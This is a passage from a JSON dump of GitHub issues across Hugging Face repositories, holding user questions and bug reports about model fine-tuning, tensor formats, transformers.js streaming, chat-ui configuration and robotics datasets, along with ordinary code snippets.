Developer\",\r\n \"ETL Developer\",\r\n \"Hadoop Developer\",\r\n \"Spark Developer\",\r\n \"Data Engineer\",\r\n \"Data Integration Specialist\",\r\n \"Data Pipeline Engineer\",\r\n \"Data Architect\",\r\n \"Database Administrator\",\r\n \"ETL Architect\",\r\n \"Data Lake Engineer\",\r\n \"Informatica Developer\",\r\n \"DataOps Engineer\",\r\n \"BI Developer\",\r\n \"Data Migration Specialist\",\r\n \"Data Warehouse Architect\",\r\n \"ETL Tester\",\r\n \"Big Data Platform Engineer\",\r\n \"Apache Kafka Engineer\",\r\n \"Snowflake Developer\",\r\n \"Data Quality Engineer\",\r\n \"Data Ingestion Engineer\",\r\n \"Big Data Consultant\",\r\n \"ETL Manager\"\r\n ]\r\n}\r\n```\r\n\r\n**TrainingArgs**\r\n```py\r\nargs = TrainingArguments(\r\n batch_size=16,\r\n num_epochs=1,\r\n evaluation_strategy=\"epoch\",\r\n save_strategy=\"epoch\",\r\n load_best_model_at_end=True,\r\n)\r\n```\r\n\r\n**Here is the complete set of functional areas.**\r\n```py\r\nfunctional_areas = [\r\n \"Accounting / Finance\",\r\n \"Backend Development\",\r\n \"Big Data / DWH / ETL\",\r\n \"Brand Management\",\r\n \"Content Writing\",\r\n \"Customer Service\",\r\n \"Data Analysis / Business Intelligence\",\r\n \"Data Science / Machine Learning\",\r\n \"Database Admin / Development\",\r\n \"DevOps / Cloud\",\r\n \"Embedded / Kernel Development\",\r\n \"Event Management\",\r\n \"Frontend Development\",\r\n \"Full-Stack Development\",\r\n \"Functional / Technical Consulting\",\r\n \"General Management / Strategy\",\r\n \"IT Management / IT Support\",\r\n \"IT Security\",\r\n \"Mobile Development\",\r\n \"Network Administration\",\r\n \"Online Marketing\",\r\n \"Operations Management\",\r\n \"PR / Communications\",\r\n \"QA / SDET\",\r\n \"SEO / SEM\",\r\n \"Sales / Business Development\"\r\n]\r\n```\r\n\r\nMy guess is accuracy is low because of short text (which is just job title). 
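One low-cost experiment for inputs this short (an assumption to validate, not a known fix) is to template the bare titles so the sentence encoder sees a full sentence at both training and inference time:

```python
# Hypothetical preprocessing for the job-title classifier discussed above.
def with_template(title: str) -> str:
    return f"The job title '{title}' belongs to which functional area?"

examples = [with_template(t) for t in ["SDET", "ETL Developer", "QA Lead"]]
print(examples[0])  # The job title 'SDET' belongs to which functional area?
```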
Please suggest few things which I can try out to improve the accuracy of the model.", "url": "https://github.com/huggingface/setfit/issues/558", "state": "open", "labels": [], "created_at": "2024-09-20T06:09:07Z", "updated_at": "2024-11-11T11:23:31Z", "user": "29swastik" }, { "repo": "huggingface/safetensors", "number": 527, "title": "[Question] Comparison with the zarr format?", "body": "Hi,\r\n\r\nI know that safetensors are widely used nowadays in HF, and the comparisons made in this repo's README file make a lot of sense.\r\n\r\nHowever, I am now surprised to see that there is no comparison with zarr, which is probably the most widely used format to store tensors in an universal, compressed and scalable way.\r\n\r\nIs there any particular reason why safetensors was created instead of just using zarr, which has been around for longer (and has nice benefits such as good performance in object storage reads and writes)?\r\n\r\nThank you!", "url": "https://github.com/huggingface/safetensors/issues/527", "state": "open", "labels": [], "created_at": "2024-09-19T13:32:17Z", "updated_at": "2025-01-13T17:56:46Z", "comments": 13, "user": "julioasotodv" }, { "repo": "huggingface/transformers", "number": 33584, "title": "How to fine tune Qlora with Custum trainer. ", "body": "Full model fine-tuning code is given below. How can i modify the code to train Qlora based model.\r\n\r\n```import sys\r\nimport os\r\ncurrent_directory = os.path.dirname(os.path.abspath(__file__))\r\nsys.path.append(current_directory) \r\n\r\nfrom src.custom_dataset import RawFileDataset\r\nimport copy\r\nimport random\r\nfrom dataclasses import dataclass, field\r\nfrom typing import Optional, Dict, Sequence\r\nimport os\r\n\r\nimport torch\r\nimport torch.distributed\r\nimport transformers\r\nfrom transformers import Trainer\r\n\r\nIGNORE_INDEX = -100\r\nDEFAULT_PAD_TOKEN = \"[PAD]\"\r\nDEFAULT_EOS_TOKEN = \"\"\r\nDEFAULT_BOS_TOKEN = \"\"\r\nDEFAULT_UNK_TOKEN = \"\"\r\n\r\n\r\n\r\n@dataclass\r\nclass ModelArguments:\r\n model_name_or_path: Optional[str] = field(default=\"facebook/opt-125m\")\r\n\r\n\r\n@dataclass\r\nclass DataArguments:\r\n data_path: str = field(default=None, metadata={\"help\": \"Path to the training data.\"})\r\n train_file: str = field(default=None, metadata={\"help\": \"train file name\"})\r\n val_file: str = field(default=None, metadata={\"help\": \"val file name\"})\r\n\r\n@dataclass\r\nclass TrainingArguments(transformers.TrainingArguments):\r\n cache_dir: Optional[str] = field(default=None)\r\n optim: str = field(default=\"adamw_torch\")\r\n model_max_length: int = field(\r\n default=512,\r\n metadata={\"help\": \"Maximum sequence length. 
Sequences will be right padded (and possibly truncated).\"},\r\n )\r\n\r\n\r\ndef safe_save_model_for_hf_trainer(trainer: transformers.Trainer, output_dir: str):\r\n \"\"\"Collects the state dict and dump to disk.\"\"\"\r\n state_dict = trainer.model.state_dict()\r\n if trainer.args.should_save:\r\n cpu_state_dict = {key: value.cpu() for key, value in state_dict.items()}\r\n del state_dict\r\n trainer._save(output_dir, state_dict=cpu_state_dict) # noqa\r\n\r\n\r\ndef smart_tokenizer_and_embedding_resize(\r\n special_tokens_dict: Dict,\r\n tokenizer: transformers.PreTrainedTokenizer,\r\n model: transformers.PreTrainedModel,\r\n):\r\n \"\"\"Resize tokenizer and embedding.\r\n\r\n Note: This is the unoptimized version that may make your embedding size not be divisible by 64.\r\n \"\"\"\r\n num_new_tokens = tokenizer.add_special_tokens(special_tokens_dict)\r\n model.resize_token_embeddings(len(tokenizer))\r\n\r\n if num_new_tokens > 0:\r\n input_embeddings = model.get_input_embeddings().weight.data\r\n output_embeddings = model.get_output_embeddings().weight.data\r\n\r\n input_embeddings_avg = input_embeddings[:-num_new_tokens].mean(dim=0, keepdim=True)\r\n output_embeddings_avg = output_embeddings[:-num_new_tokens].mean(dim=0, keepdim=True)\r\n\r\n input_embeddings[-num_new_tokens:] = input_embeddings_avg\r\n output_embeddings[-num_new_tokens:] = output_embeddings_avg\r\n\r\n\r\ndef _tokenize_fn(strings: Sequence[str], tokenizer: transformers.PreTrainedTokenizer) -> Dict:\r\n \"\"\"Tokenize a list of strings.\"\"\"\r\n tokenized_list = [\r\n tokenizer(\r\n text,\r\n return_tensors=\"pt\",\r\n padding=\"longest\",\r\n max_length=tokenizer.model_max_length,\r\n truncation=True,\r\n )\r\n for text in strings\r\n ]\r\n input_ids = labels = [tokenized.input_ids[0] for tokenized in tokenized_list]\r\n input_ids_lens = labels_lens = [\r\n tokenized.input_ids.ne(tokenizer.pad_token_id).sum().item() for tokenized in tokenized_list\r\n ]\r\n return dict(\r\n input_ids=input_ids,\r\n labels=labels,\r\n input_ids_lens=input_ids_lens,\r\n labels_lens=labels_lens,\r\n )\r\n\r\n\r\ndef preprocess(\r\n sources: Sequence[str],\r\n targets: Sequence[str],\r\n tokenizer: transformers.PreTrainedTokenizer,\r\n) -> Dict:\r\n \"\"\"Preprocess the data by tokenizing.\"\"\"\r\n examples = [s + t for s, t in zip(sources, targets)]\r\n examples_tokenized, sources_tokenized = [_tokenize_fn(strings, tokenizer) for strings in (examples, sources)]\r\n input_ids = examples_tokenized[\"input_ids\"]\r\n labels = copy.deepcopy(input_ids)\r\n for label, source_len in zip(labels, sources_tokenized[\"input_ids_lens\"]):\r\n label[:source_len] = IGNORE_INDEX\r\n return dict(input_ids=input_ids, labels=labels)\r\n\r\n\r\n@dataclass\r\nclass DataCollatorForSupervisedDataset(object):\r\n \"\"\"Collate examples for supervised fine-tuning.\"\"\"\r\n\r\n tokenizer: transformers.PreTrainedTokenizer\r\n\r\n def __call__(self, instances: Sequence[Dict]) -> Dict[str, torch.Tensor]:\r\n ### one can customize here, since we set the T for joint loss as 2\r\n \r\n batch_input_ids1, batch_input_ids2 = [], []\r\n batch_attention_mask1, batch_attention_mask2 = [], []\r\n batch_labels1, batch_labels2 = [], []\r\n\r\n for instance in instances:\r\n instance1, instance2 = instance[\"instance_1\"], instance[\"instance_2\"]\r\n batch_input_ids1.append(instance1[\"input_ids\"])\r\n batch_input_ids2.append(instance2[\"input_ids\"])\r\n batch_attention_mask1.append(instance1[\"attention_mask\"])\r\n batch_attention_mask2.append(instan", "url": 
"https://github.com/huggingface/transformers/issues/33584", "state": "closed", "labels": [ "trainer", "Quantization" ], "created_at": "2024-09-19T09:40:00Z", "updated_at": "2024-10-28T08:05:06Z", "user": "ankitprezent" }, { "repo": "huggingface/diffusers", "number": 9470, "title": "Prompt scheduling in Diffusers like A1111", "body": "Hi everyone, I have a question that how to implement the [prompt scheduling feature](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Features#prompt-editing) in A1111 by diffusers library.\r\n\r\n**Example prompt:** Official portrait of a smiling world war ii general, `[male:female:0.99]`, cheerful, happy, detailed face, 20th century, highly detailed, cinematic lighting, digital art painting by Greg Rutkowski.\r\n\r\n![image](https://github.com/user-attachments/assets/d7c4b6d6-a0b9-455b-b4ef-2d581027204f)\r\n", "url": "https://github.com/huggingface/diffusers/issues/9470", "state": "closed", "labels": [], "created_at": "2024-09-19T09:07:30Z", "updated_at": "2024-10-19T17:22:23Z", "comments": 5, "user": "linhbeige" }, { "repo": "huggingface/chat-ui", "number": 1476, "title": "Update docs to explain how to use `tokenizer` field for chat prompt formats", "body": "## Bug description\r\n\r\nIn README.md, it's stated that the prompts used in production for HuggingChat can be found in PROMPTS.md.\r\n\r\nHowever, PROMPTS.md has not been updated for 7 months and there are several prompts missing for newer models.\r\n", "url": "https://github.com/huggingface/chat-ui/issues/1476", "state": "open", "labels": [ "bug", "documentation" ], "created_at": "2024-09-18T22:49:53Z", "updated_at": "2024-09-20T18:05:05Z", "user": "horsten" }, { "repo": "huggingface/transformers.js", "number": 935, "title": "Is converting a Gemma 2B quantized compatible with transformers.js/onnx?", "body": "### Question\n\nI'm new to dev and wanted to know if converting a gemma 2b using the Optimum converter would work for this model?", "url": "https://github.com/huggingface/transformers.js/issues/935", "state": "open", "labels": [ "question" ], "created_at": "2024-09-18T15:57:55Z", "updated_at": "2024-09-24T20:26:53Z", "user": "iamhenry" }, { "repo": "huggingface/dataset-viewer", "number": 3063, "title": "Simplify test code where a dataset is set as gated", "body": "[huggingface_hub@0.25.0](https://github.com/huggingface/huggingface_hub/releases/tag/v0.25.0) provides an API to set a repository as gated.\r\n\r\nWe had included a custom version of `update_repo_settings` because it lacked a `gated` parameter. 
Now we can switch back to the `huggingface_hub` method\r\n\r\nhttps://github.com/huggingface/dataset-viewer/blob/4859100ef282dcf73257dfb60e6b5a20d5955c68/jobs/cache_maintenance/tests/utils.py#L41\r\nhttps://github.com/huggingface/dataset-viewer/blob/4859100ef282dcf73257dfb60e6b5a20d5955c68/services/admin/tests/fixtures/hub.py#L24\r\nhttps://github.com/huggingface/dataset-viewer/blob/4859100ef282dcf73257dfb60e6b5a20d5955c68/services/worker/tests/fixtures/hub.py#L35", "url": "https://github.com/huggingface/dataset-viewer/issues/3063", "state": "closed", "labels": [ "good first issue", "tests", "refactoring / architecture", "dependencies" ], "created_at": "2024-09-18T09:08:14Z", "updated_at": "2025-07-17T15:00:40Z", "user": "severo" }, { "repo": "huggingface/transformers.js", "number": 934, "title": "Repeating tokens in TextStreamer", "body": "### Question\n\n```\r\nimport {\r\n AutoTokenizer,\r\n AutoModelForCausalLM,\r\n TextStreamer,\r\n InterruptableStoppingCriteria,\r\n} from \"@huggingface/transformers\";\r\n\r\nclass TextGenerationPipeline {\r\n static model = null;\r\n static tokenizer = null;\r\n static streamer = null;\r\n\r\n static async getInstance(\r\n progress_callback = null,\r\n model_id = \"onnx-community/Phi-3.5-mini-instruct-onnx-web\",\r\n ) {\r\n this.tokenizer = AutoTokenizer.from_pretrained(model_id, {\r\n progress_callback,\r\n });\r\n\r\n this.model = AutoModelForCausalLM.from_pretrained(model_id, {\r\n // dtype: \"q4\",\r\n dtype: \"q4f16\",\r\n device: \"webgpu\",\r\n use_external_data_format: true,\r\n progress_callback,\r\n });\r\n\r\n return Promise.all([this.tokenizer, this.model]);\r\n }\r\n}\r\n\r\nconst stopping_criteria = new InterruptableStoppingCriteria();\r\nlet past_key_values_cache = null;\r\n\r\nchrome.runtime.onMessage.addListener((request, sender, sendResponse) => {\r\n if (request.action === \"initializeLlmModel\") {\r\n console.log(\"setting up llm\");\r\n const initialize = async () => {\r\n const [tokenizer, model] = await TextGenerationPipeline.getInstance(\r\n (x) => {\r\n console.log(x);\r\n },\r\n request.model_id,\r\n );\r\n const inputs = tokenizer(\"a\");\r\n const generatedOutput = await model.generate({\r\n ...inputs,\r\n max_new_tokens: 1,\r\n });\r\n console.log(generatedOutput);\r\n sendResponse({ status: \"success\" });\r\n };\r\n\r\n initialize();\r\n return true;\r\n }\r\n\r\n if (request.action === \"generateText\") {\r\n console.log(\"generating text\");\r\n async function generateText() {\r\n const [tokenizer, model] = await TextGenerationPipeline.getInstance();\r\n\r\n const text_callback_function = (output) => {\r\n console.log(output);\r\n if (output) {\r\n chrome.runtime.sendMessage({\r\n action: \"chatMessageChunk\",\r\n chunk: output,\r\n });\r\n }\r\n };\r\n\r\n const streamer = new TextStreamer(tokenizer, {\r\n skip_prompt: true,\r\n skip_special_tokens: true,\r\n callback_function: text_callback_function,\r\n });\r\n\r\n const inputs = tokenizer.apply_chat_template(request.messages, {\r\n add_generation_prompt: true,\r\n return_dict: true,\r\n });\r\n\r\n const { past_key_values, sequences } = await model.generate({\r\n ...inputs,\r\n past_key_values: past_key_values_cache,\r\n // Sampling\r\n // do_sample: true,\r\n // top_k: 3,\r\n // temperature: 0.2,\r\n\r\n max_new_tokens: 1024,\r\n stopping_criteria,\r\n return_dict_in_generate: true,\r\n streamer,\r\n });\r\n\r\n past_key_values_cache = past_key_values;\r\n\r\n const decoded = tokenizer.batch_decode(sequences, {\r\n skip_special_tokens: false,\r\n });\r\n\r\n 
console.log(decoded);\r\n sendResponse({ generatedOutput: decoded, status: \"success\" });\r\n }\r\n generateText();\r\n return true;\r\n }\r\n});\r\n```\r\n\r\nIn the `text_callback_function` it is sending same token multiple times. What could be the reason? I am handling it on the frontend for the time being but was wondering what is the reason? What am I doing wrong here?\r\n\r\nThank you so much for the help in advance! ", "url": "https://github.com/huggingface/transformers.js/issues/934", "state": "closed", "labels": [ "question" ], "created_at": "2024-09-18T02:53:36Z", "updated_at": "2025-10-13T04:50:11Z", "user": "chandeldivyam" }, { "repo": "huggingface/transformers.js", "number": 933, "title": "Uncaught (in promise) TypeError: r.logits is not iterable", "body": "### Question\r\n\r\nHey guys,\r\n\r\nI have been trying to train a model for text classification then convert it to an onnx file for use in transformers js following this video\r\nhttps://www.youtube.com/watch?v=W_lUGPMW_Eg\r\n\r\nI keep getting the error Uncaught (in promise) TypeError: r.logits is not iterable\r\n\r\nAny ideas on where I might be going wrong or if something has changed since this was released?\r\n\r\nThis is my basic code, I have python hosting the files locally\r\n\r\n```\r\n\r\n\r\n\r\n \r\n \r\n TinyBERT Model in Vanilla JS\r\n\r\n\r\n\r\n

[HTML markup lost in extraction: the pasted page contained a heading "TinyBERT Model Inference", a text input labeled "Enter text for classification:", and a "Prediction:" output area]
```", "url": "https://github.com/huggingface/transformers.js/issues/933", "state": "open", "labels": [ "question" ], "created_at": "2024-09-16T20:26:02Z", "updated_at": "2024-09-17T19:35:26Z", "user": "Joseff-Evans" }, { "repo": "huggingface/chat-ui", "number": 1472, "title": "Mistral api configuration without Cloudflare", "body": "I'd like to set up a local deployment using **only the mistral API**: https://docs.mistral.ai/api.\r\n\r\nCan I use ChatUI without an HF deployment and Cloudflare account?\r\n\r\nI leave the .env unchanged and overwrite the env.local with the following code\r\n\r\n```yml\r\nAGENT_ID=\r\nMISTRAL_API_KEY==\r\nMODELS='[\r\n {\r\n \"name\": \"mistral-large\",\r\n \"displayName\": \"mistralai\",\r\n \"description\": \"Mistral standard\",\r\n \"websiteUrl\": \"https://docs.mistral.ai/\",\r\n \"preprompt\": \"\",\r\n \"parameters\": {\r\n \"temperature\": 0.1,\r\n \"top_p\": 0.95,\r\n \"top_k\": 5,\r\n \"stream\": true,\r\n \"agent_id\": \"{AGENT_ID}\",\r\n \"tool_choice\": \"auto\",\r\n \"max_new_tokens\": 4096\r\n },\r\n \"endpoints\": [\r\n {\r\n \"type\": \"openai\",\r\n \"baseURL\": \"https://api.mistral.ai/v1\",\r\n \"defaultHeaders\": {\r\n \"Authorization\": \"Bearer {MISTRAL_API_KEY}\"\r\n }\r\n }\r\n ]\r\n },\r\n {\r\n \"name\": \"mistral-embed\",\r\n \"displayName\": \"Mistral-embedbedings\",\r\n \"description\": \"Mistral embedding model.\",\r\n \"chunkCharLength\": 1024,\r\n \"endpoints\": [\r\n {\r\n \"type\": \"openai\",\r\n \"baseURL\": \"https://api.mistral.ai/v1\",\r\n \"defaultHeaders\": {\r\n \"Authorization\": \"Bearer {MISTRAL_API_KEY}\"\r\n }\r\n }\r\n ]\r\n }\r\n]'\r\nMONGODB_URL=mongodb://localhost:27017/\r\nPUBLIC_APP_ASSETS=chatui\r\nPUBLIC_APP_COLOR=blue\r\nPUBLIC_APP_NAME=\"Mistral Local\"\r\n```\r\nNot quite sure though if the agent_id is overwritten by the \"name\". ", "url": "https://github.com/huggingface/chat-ui/issues/1472", "state": "open", "labels": [ "support" ], "created_at": "2024-09-16T18:51:09Z", "updated_at": "2024-09-17T08:43:40Z", "comments": 0, "user": "JonasMedu" }, { "repo": "huggingface/transformers.js", "number": 932, "title": "Best small model for text generation? ", "body": "I'm looking to build an AI Journaling app that helps you reflect on your journal entries\r\n\r\nI'm looking for a model like (GPT or Claude) that will take the selected text and provide insights based on a prompt I provide\r\n\r\nIn this case the prompt will provide suggestions based on psychology techniques like CBT and ACT to help you with your life.\r\n\r\nAny ideas on which small model will be able to accomplish this? I've tried GPT2, t5- small, and I couldn't get Phi-3 to work", "url": "https://github.com/huggingface/transformers.js/issues/932", "state": "open", "labels": [ "question" ], "created_at": "2024-09-16T18:06:23Z", "updated_at": "2024-09-26T08:06:35Z", "user": "iamhenry" }, { "repo": "huggingface/distil-whisper", "number": 149, "title": "How to load using openai-whisper package to load the model?", "body": "How can I use the openai-whisper package to load the model?", "url": "https://github.com/huggingface/distil-whisper/issues/149", "state": "open", "labels": [], "created_at": "2024-09-15T15:08:46Z", "updated_at": "2024-09-15T15:08:46Z", "user": "lucasjinreal" }, { "repo": "huggingface/competitions", "number": 40, "title": "How to modify the competition", "body": "Hi! I created a new competition using the [tool given here](https://huggingface.co/spaces/competitions/create). 
All good up till here.\r\nThen I had the space automatically running. To modify the competition, I cloned the repository of the space locally with the command given on the UI\r\n```\r\ngit clone https://huggingface.co/spaces/cmdgentest/commandgen\r\n```\r\nWhen I inspected the contents, it had only two files - `Dockerfile` and `README.md`. This was surprising as i expected the files mentioned [here](https://huggingface.co/docs/competitions/en/competition_repo).\r\nHowever, I still created these files myself and pushed the changes to the spaces repo. Once the space was restarted and running, I still wasn't able to see the changes I made.\r\n\r\nAt this point I am confused where exactly should I put files like `conf.json` in my case.", "url": "https://github.com/huggingface/competitions/issues/40", "state": "closed", "labels": [ "stale" ], "created_at": "2024-09-15T13:45:26Z", "updated_at": "2024-10-08T15:06:28Z", "user": "dakshvar22" }, { "repo": "huggingface/speech-to-speech", "number": 101, "title": "I am really really curious about how to set up this project on a server to serve multiple users. I have been trying for a long time but haven't come up with a very good solution.", "body": "", "url": "https://github.com/huggingface/speech-to-speech/issues/101", "state": "open", "labels": [], "created_at": "2024-09-15T13:42:18Z", "updated_at": "2025-02-04T15:44:31Z", "user": "demoBBB" }, { "repo": "huggingface/transformers", "number": 33489, "title": "passing past_key_values as a tuple is deprecated, but unclear how to resolve", "body": "### System Info\n\nCopy-and-paste the text below in your GitHub issue and FILL OUT the two last points.\r\n\r\n- `transformers` version: 4.44.2\r\n- Platform: Linux-5.4.0-167-generic-x86_64-with-glibc2.35\r\n- Python version: 3.10.12\r\n- Huggingface_hub version: 0.24.7\r\n- Safetensors version: 0.4.5\r\n- Accelerate version: 0.34.2\r\n- Accelerate config: \tnot found\r\n- PyTorch version (GPU?): 2.1.1+cu121 (True)\r\n- Tensorflow version (GPU?): not installed (NA)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Using distributed or parallel set-up in script?: NA\r\n- Using GPU in script?: yes\r\n- GPU type: NVIDIA A40\n\n### Who can help?\n\n@ArthurZucker \n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\n```\r\nimport torch\r\nfrom datasets import load_dataset\r\nfrom transformers import AutoModelForCausalLM, AutoTokenizer, TrainingArguments\r\nfrom trl import SFTTrainer, SFTConfig\r\nfrom accelerate import Accelerator\r\nfrom peft import LoraConfig\r\nimport math, os, random\r\nfrom datetime import datetime\r\n\r\n# Select rows to train on\r\ninitial_rows = 50000\r\nannealing_rows = 10000\r\neval_rows = 10000 # Only 10000 rows for evaluation\r\n\r\nbatch_size = 8\r\nga = 4\r\n\r\nlearning_rate=1e-3\r\n\r\ndef setup_environment():\r\n os.environ['WANDB_DISABLED'] = 'true'\r\n return Accelerator()\r\n\r\ndef load_model_and_tokenizer():\r\n model_name = \"Trelis/80M-0.0090-cosmopedia\"\r\n model_kwargs = {\r\n \"torch_dtype\": torch.bfloat16,\r\n }\r\n tokenizer = AutoTokenizer.from_pretrained(\"HuggingFaceTB/SmolLM-360M-Instruct\")\r\n model = AutoModelForCausalLM.from_pretrained(model_name, **model_kwargs)\r\n return model, tokenizer\r\n\r\ndef 
load_and_preprocess_train_dataset(start_idx, num_rows):\r\n dataset = load_dataset(\"TIGER-Lab/WebInstructSub\", split=\"train\",\r\n streaming=True\r\n )\r\n dataset = dataset.skip(start_idx).take(num_rows)\r\n \r\n def format_instruction(example):\r\n return {\r\n \"messages\": [\r\n {\"role\": \"user\", \"content\": example[\"question\"]},\r\n {\"role\": \"assistant\", \"content\": example[\"answer\"]}\r\n ]\r\n }\r\n \r\n formatted_dataset = dataset.map(format_instruction)\r\n return formatted_dataset\r\n\r\ndef format_instruction_for_trainer(example):\r\n tokenizer = AutoTokenizer.from_pretrained(\"HuggingFaceTB/SmolLM-360M-Instruct\")\r\n \r\n return tokenizer.apply_chat_template(\r\n example[\"messages\"],\r\n truncation=True,\r\n padding=\"max_length\",\r\n max_length=2048,\r\n tokenize=False,\r\n )\r\n\r\ndef load_and_preprocess_eval_dataset():\r\n dataset = load_dataset(\"TIGER-Lab/WebInstructSub\", split=\"train\")\r\n \r\n # Get the total number of rows in the dataset\r\n total_rows = len(dataset)\r\n \r\n # Generate a list of random indices\r\n random_indices = random.sample(range(total_rows), eval_rows)\r\n \r\n # Select the random rows\r\n dataset = dataset.select(random_indices)\r\n \r\n def format_instruction(example):\r\n return {\r\n \"messages\": [\r\n {\"role\": \"user\", \"content\": example[\"question\"]},\r\n {\"role\": \"assistant\", \"content\": example[\"answer\"]}\r\n ]\r\n }\r\n \r\n formatted_dataset = dataset.map(format_instruction, remove_columns=dataset.column_names)\r\n return formatted_dataset\r\n\r\ndef main():\r\n accelerator = setup_environment()\r\n \r\n model, tokenizer = load_model_and_tokenizer()\r\n print(model.device)\r\n \r\n # Combined training dataset (streaming)\r\n total_rows = initial_rows + annealing_rows\r\n train_dataset = load_and_preprocess_train_dataset(0, total_rows)\r\n \r\n # Evaluation dataset (non-streaming, last 1000 rows)\r\n eval_dataset = load_and_preprocess_eval_dataset()\r\n \r\n # Calculate steps\r\n num_epochs = 1\r\n total_steps = (total_rows * num_epochs) // (batch_size * ga)\r\n initial_steps = (initial_rows * num_epochs) // (batch_size * ga)\r\n \r\n timestamp = datetime.now().strftime(\"%Y%m%d_%H%M%S\")\r\n run_name = f\"SFT-{total_rows}rows-lr{learning_rate}-{timestamp}\"\r\n \r\n training_args = SFTConfig(\r\n output_dir=f\"./Trelis_local/80M-0.015-cosmopedia-SFT-{run_name}\",\r\n run_name=run_name,\r\n logging_dir=f\"./logs/{run_name}\",\r\n eval_strategy=\"steps\",\r\n save_strategy=\"steps\",\r\n report_to=\"tensorboard\",\r\n num_train_epochs=num_epochs,\r\n per_device_train_batch_size=batch_size,\r\n per_device_eval_batch_size=batch_size,\r\n warmup_steps=20,\r\n logging_steps=int(total_steps * 0.1),\r\n eval_steps=int(total_steps * 0.1),\r\n save_steps=int(total_steps * 0.1),\r\n learning_rate=learning_rate,\r\n bf16=True,\r\n max_steps=total_steps,\r\n gra", "url": "https://github.com/huggingface/transformers/issues/33489", "state": "closed", "labels": [ "bug" ], "created_at": "2024-09-14T13:58:18Z", "updated_at": "2025-11-29T04:50:43Z", "user": "RonanKMcGovern" }, { "repo": "huggingface/lerobot", "number": 436, "title": "Image storage format", "body": "I am quite interested in using `LeRobotDataset` for large scale training. 
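On the `past_key_values` deprecation reported further up: the warning steers toward `Cache` objects, and a legacy tuple can be wrapped explicitly. A sketch with a tiny public model (the model here is just for illustration, not the one from the report):

```python
from transformers import AutoModelForCausalLM, AutoTokenizer, DynamicCache

tok = AutoTokenizer.from_pretrained("sshleifer/tiny-gpt2")
model = AutoModelForCausalLM.from_pretrained("sshleifer/tiny-gpt2")
ids = tok("Why is the sky blue?", return_tensors="pt").input_ids

out = model(ids, use_cache=True)
pkv = out.past_key_values
if isinstance(pkv, tuple):  # legacy tuple format on older versions: wrap it
    pkv = DynamicCache.from_legacy_cache(pkv)

# Subsequent steps pass the Cache object instead of a raw tuple.
next_out = model(ids[:, -1:], past_key_values=pkv, use_cache=True)
```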
I am interested in getting more context on the options for storing images so I am aware of the implications this might have:\r\n- Did you by chance study if the mp4 video compression has any negative effects on the image quality in terms of model performance (or any studies you based your decision on)\r\n- I see atm lerobot supports storing images either in `.mp4` or `.pt`, but not in `arrow` or `parquet` format as many other HF datasets do. Is there any specific reason you didn't add support for `arrow` / `parquet` which also provide memory mapping? Any ideas how pytorch would compare to `arrow` / `parquet` when using datasets of 100s of millions of examples?\r\n", "url": "https://github.com/huggingface/lerobot/issues/436", "state": "closed", "labels": [ "question", "dataset", "stale" ], "created_at": "2024-09-12T16:38:21Z", "updated_at": "2025-10-23T02:29:14Z", "user": "nikonikolov" }, { "repo": "huggingface/lerobot", "number": 435, "title": "Open-X datasets", "body": "Thanks for the great work! I am interested in converting more of the open-x datasets to `LeRobotDataset`.\r\n- I was wondering if there was any particular reason the entire open-x wasn't added already, e.g. some difficulties you encountered with some specific datasets?\r\n- Do you have any tips where I should be extra careful when converting from RLDS to `LeRobotDataset`, or is it generally as easy as calling the conversion script?", "url": "https://github.com/huggingface/lerobot/issues/435", "state": "closed", "labels": [ "enhancement", "question", "dataset" ], "created_at": "2024-09-12T16:29:40Z", "updated_at": "2025-10-08T08:25:55Z", "user": "nikonikolov" }, { "repo": "huggingface/lerobot", "number": 432, "title": "some questions about real world env", "body": "### System Info\n\n```Shell\nall software cfg match author's project\n```\n\n\n### Information\n\n- [ ] One of the scripts in the examples/ folder of LeRobot\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\nI am planning to control my own robot left-arm. I've almost figured out all the parts of lerobot-dataset; now I want to make my own dataset with respect to aloha_sim_transfer_cube_human rather than the \"Koch ALOHA teleop hardware system\".\r\nMy questions are:\r\n1) Must I keep such a high fps, like 50, when collecting data from the camera and arm actions?\r\n2) Actions come from human control of the arm, and states come from read operations, but how should I set the time gap between action and state?\n\n### Expected behavior\n\nanswers from anyone", "url": "https://github.com/huggingface/lerobot/issues/432", "state": "closed", "labels": [ "question" ], "created_at": "2024-09-12T09:53:23Z", "updated_at": "2025-10-08T08:27:48Z", "user": "NNsauce" }, { "repo": "huggingface/chat-ui", "number": 1463, "title": "Some bugs", "body": "## Bug description\r\n\r\nThere are several issues that I have with the site, such as slow performance both on mobile and PC. When trying to select specific parts of the text, it goes back to the original message. Sometimes it results in errors that force me to refresh the conversation. When I switch conversations I have to switch all of my messages to the latest ones.\r\nBut I feel it's not my internet that's causing the issue but something on the website.\r\n\r\n## Steps to reproduce\r\n\r\nThe performance is quite mixed, but on mobile it is unusable. 
(Samsung A40)\r\nTry to select any text, and it will direct you to the first message.\r\nThe last one I don't how to replicate except being unlucky with it.\r\n\r\n\r\n### Specs\r\n\r\n- **Windows 11**:\r\n- **Librewolf 124.0.1-1**:\r\n", "url": "https://github.com/huggingface/chat-ui/issues/1463", "state": "open", "labels": [ "bug" ], "created_at": "2024-09-12T08:13:35Z", "updated_at": "2024-09-12T09:03:58Z", "comments": 0, "user": "Ruyeex" }, { "repo": "huggingface/transformers.js", "number": 929, "title": "what is pipeline?", "body": "", "url": "https://github.com/huggingface/transformers.js/issues/929", "state": "closed", "labels": [ "question" ], "created_at": "2024-09-12T05:09:05Z", "updated_at": "2024-10-04T10:24:42Z", "user": "chakravarthi-vatala" }, { "repo": "huggingface/diffusers", "number": 9417, "title": "Suggestion for speeding up `index_for_timestep` by removing sequential `nonzero()` calls in samplers", "body": "**Is your feature request related to a problem? Please describe.**\r\nFirst off, thanks for the great codebase and providing so many resources! I just wanted to provide some insight into an improvement I made for myself, in case you'd like to include it for all samplers. I'm using the `FlowMatchEulerDiscreteScheduler` and after profiling, I've noticed that it's unexpectedly slowing down my training speeds. I'll describe the issue and proposed solution here rather than making a PR, since this would touch a lot of code and perhaps someone on the diffusers team would like to implement it.\r\n\r\n**Describe the solution you'd like.**\r\nThis line in particular is very slow because it is a for loop `step_indices = [self.index_for_timestep(t, schedule_timesteps) for t in timestep]` and the `self.index_for_timestep()` is calling a nonzero() function which is 